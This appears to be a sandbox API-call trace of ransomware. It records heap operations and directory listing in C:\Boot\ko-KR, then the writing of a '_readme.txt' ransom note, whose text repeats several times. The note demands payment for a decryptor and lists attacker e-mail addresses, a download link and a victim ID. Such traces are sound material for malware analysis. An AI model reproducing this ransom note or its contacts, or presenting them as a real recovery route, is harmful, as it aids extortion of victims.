ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0173.724] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e54b620, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x1e54b620, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e54b620, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0173.724] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e54b620, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x1e54b620, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e54b620, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0173.724] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59df8 | out: hHeap=0x2c0000) returned 1 [0173.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59df8 [0173.724] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x326560 [0173.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.726] PathFindFileNameW (pszPath="C:\\Boot\\ko-KR\\") returned="ko-KR\\" [0173.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.726] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0173.726] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.726] PathFindFileNameW (pszPath="") returned="" [0173.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.726] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0173.727] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0173.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x3aa2818 [0173.727] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3aa2818 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0173.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3a8ca68 [0173.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.727] FreeLibrary (hLibModule=0x759d0000) returned 1 [0173.727] PathAppendW (in: pszPath="C:\\Boot\\ko-KR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 1 [0173.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.727] PathFileExistsW (pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 0 [0173.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3ad0490 [0173.728] lstrcpyW (in: lpString1=0x3ad0490, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0173.728] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0173.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8db78 [0173.728] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\_readme.txt" (normalized: "c:\\boot\\ko-kr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x690 [0173.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8c0) returned 0x3ad8198 [0173.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x858) returned 0x3aa2818 [0173.728] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3aa2818, cbMultiByte=2136, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 1113 [0173.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x326560 [0173.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad8198 | out: hHeap=0x2c0000) returned 1 [0173.728] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned 1112 [0173.728] WriteFile (in: hFile=0x690, lpBuffer=0x326560*, nNumberOfBytesToWrite=0x458, lpNumberOfBytesWritten=0xa13fb64, lpOverlapped=0x0 | out: lpBuffer=0x326560*, lpNumberOfBytesWritten=0xa13fb64*=0x458, lpOverlapped=0x0) returned 1 [0173.729] CloseHandle (hObject=0x690) returned 1 [0173.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8db78 | out: hHeap=0x2c0000) returned 1 [0173.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad0490 | out: hHeap=0x2c0000) returned 1 [0173.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.730] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1e571780, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e571780, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.730] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1e571780, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e571780, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.730] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0173.730] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e571780, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x1e571780, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e571780, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0173.730] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e571780, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x1e571780, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e571780, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0173.730] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59df8 | out: hHeap=0x2c0000) returned 1 [0173.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59df8 [0173.730] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, 